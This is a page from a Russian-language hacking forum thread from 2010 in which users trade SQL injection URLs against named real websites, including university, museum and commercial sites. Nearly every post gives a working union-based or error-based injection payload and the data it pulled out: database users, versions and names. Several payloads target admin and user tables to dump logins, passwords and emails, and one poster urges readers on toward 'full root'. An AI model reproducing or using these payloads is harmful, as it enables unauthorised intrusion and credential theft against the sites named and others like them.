ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12141  
Старый 14.05.2010, 22:17
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

_http://www.uludag.edu.tr/uludagunien.php?kat=-5+union+select+1,2,3,4,5,6,7,version()
Database Version: 4.1.22

PR-8

админка - error 403
 
Ответить с цитированием

  #12142  
Старый 14.05.2010, 22:25
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.seaes.manchester.ac.uk
ТИЦ: 20
PR: 7
Примеры запросов:
Код:
http://www.seaes.manchester.ac.uk/undergraduate/courses/modules/module.php?id=-336+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,group_concat(0x0b,table_name),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+information_schema.tables--+  

http://www.seaes.manchester.ac.uk/undergraduate/courses/modules/module.php?id=-336+union+all+select+1,group_concat(0x0b,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,group_concat(0x0b,user_name,0x3a,user_password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+cpg132_users--+
version - 5.1.34-1-log
user - earthadmuser@abel.mc.man.ac.uk
database - earthadm
os - debian-linux-gnu

==========================================

Сайт: http://www.beoordeelmijnleraar.nl
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.beoordeelmijnleraar.nl/sub.php?groupID=5&userID=4&ID=9999+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),+1,+70),+floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch12-log
user - bml@localhost
database - bml
os - pc-linux-gnu

==========================================

Сайт: http://www.donkervoorttouringclub.nl
ТИЦ: 10
PR: 2
Пример запроса:
Код:
http://www.donkervoorttouringclub.nl/splace/f.php?ID=11335+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),+1,+70),+floor(rand(0)*2)))--+
version - 5.0.81-log
user - dtc_splace@localhost
database - dtc_splace
os - pc-linux-gnu
 
Ответить с цитированием

  #12143  
Старый 14.05.2010, 22:27
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
http://www.goudengravure.nl/goudengravure.php?ac=module&module=aanbod&id=-1 UNION SELECT 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11 from information_schema.tables limit 0,1+--+
User: u005893_bart@web7.c1.internal
Database: db005893_goude000
Version: 5.0.87-d10-ourdelta65-byte3+bytelenny1-log

Код:
http://www.mace.manchester.ac.uk/postgraduate/research/projects/description/?id=-1+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+125,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
User: mcgsswh@kepler.mc.man.ac.uk
Database: pip
Version: 5.1.34-1-log

Код:
http://www.acllf.org/album.php?type=centre&id=-1%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4++
User: acllf@localhost
Database: acllf
Version: 5.0.51a-3ubuntu5.5

Код:
http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29x%20GROUP%20BY%20CONCAT%28user%28%29,%20FLOOR%28RAND%280%29*2%29%29%29%20--
User: aresazi@web.ee.sun.ac.za
Database: aresazi
Version: 5.0.51a-3ubuntu5.5

Последний раз редактировалось b82a; 14.05.2010 в 22:44..
 
Ответить с цитированием

  #12144  
Старый 14.05.2010, 22:52
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

вот очередная порция инъешек от меня=))
Вам осталось приложить немного усилий до получения полного рута...=))

П.С. Логины и пароли в открытом виде не выкладываю, кому надо, тот сам скопипастит линки в адрес=)

В основном сайты в зоне .edu

seafmd-rcu.oie.int
Код:
http://www.seafmd-rcu.oie.int/news.php?articleID=-65+union+select+concat(username,0x20,password),2,3,4,5+from+users+limit+4,1--
uselessjunk.com
Код:
http://www.uselessjunk.com/article_full.php?id=-13199+union+select+1,2,fld_password,4,5,6+from+tbl_admin--+

harrisburgu.edu
Код:
http://www.harrisburgu.edu/news/article.php?id=-610+and+1=2+union+select+1,concat(username,0x20,password),3,4+from+users+limit+3,1--
stnersess.edu
Код:
http://www.stnersess.edu/news/detail.php?id=-260+union+select+1,2,3,4,5,6,concat(password,0x20,userid),8+from+users--
mbc.edu
Код:
http://www.mbc.edu/news/r_detail.php?id=-1947+union+select+concat(Username,0x20,Password),2,3,4,5,6,7,8+from+tbladmin--
llk.media.mit.edu
Код:
http://llk.media.mit.edu/spotlight.php?id=-3+union+select+concat(User,0x20,Password),2,3,4,5+from+mysql.user--
 
Ответить с цитированием

  #12145  
Старый 15.05.2010, 03:58
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

Код:
http://www.vostokagro.ru/content.php?id=90+and+(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,database(),version(),user())),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
Database: u18876_3
Version: 5.0.88-log
User: u18876@10.10.227.511
PR: 3
ТИЦ: 120

Код:
http://www.redicecreations.com/article.php?id=7381'+and+(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,database(),version(),user())),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
Database: redicecreations
Version: 5.0.32-Debian_7etch11-log
User: redicecreations@srv48.
PR: 5
ТИЦ: 10
 
Ответить с цитированием

  #12146  
Старый 15.05.2010, 06:35
Lasteeck
Познающий
Регистрация: 05.04.2010
Сообщений: 30
Провел на форуме:
151946

Репутация: 2
По умолчанию

http://www.legovaz.spb.ru

Код:
http://www.legovaz.spb.ru/photogallery/photo.php?id=100+and+1=0+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5--
User: legovaz_spb@fe79.hc.ru
Database: wwwlegovazru_spb
Version: 4.1.25-log

ТИЦ 10
ПР 1

Последний раз редактировалось Lasteeck; 15.05.2010 в 06:37..
 
Ответить с цитированием

  #12147  
Старый 15.05.2010, 10:16
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Код:
http://www.supervolos.ru/index1.php?t=-1+union+select+1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5,6,7,8+--
version : 5.0.54
user : z262240_igoruser@localhost
database : z262240_svolos
os : pc-linux-gnu
 
Ответить с цитированием

  #12148  
Старый 15.05.2010, 16:57
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
http://www.gdchivast.com/index.php?f=rendiandongtai&ac=read&id=-1%20UNION%20SELECT%201,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13+--+
Version: 4.1.20
Database: gdchivast
User: gdchivast_f@localhost
 
Ответить с цитированием

  #12149  
Старый 15.05.2010, 19:23
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.samaranews.ru/

Код:
http://www.samaranews.ru/catalog/art/art.php?art=-1+and+1=2+union+select+1,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6+--
version : 5.0.51a-community-nt-log
user : gb_samnews@10.0.2.3
database : gb_samnews
os : Win64
 
Ответить с цитированием

  #12150  
Старый 15.05.2010, 19:33
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

http://historywired.si.edu/object.cfm?ID=-1' or 1=@@version
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 15 (пользователей: 0 , гостей: 15)
 


Быстрый переход




ANTICHAT.XYZ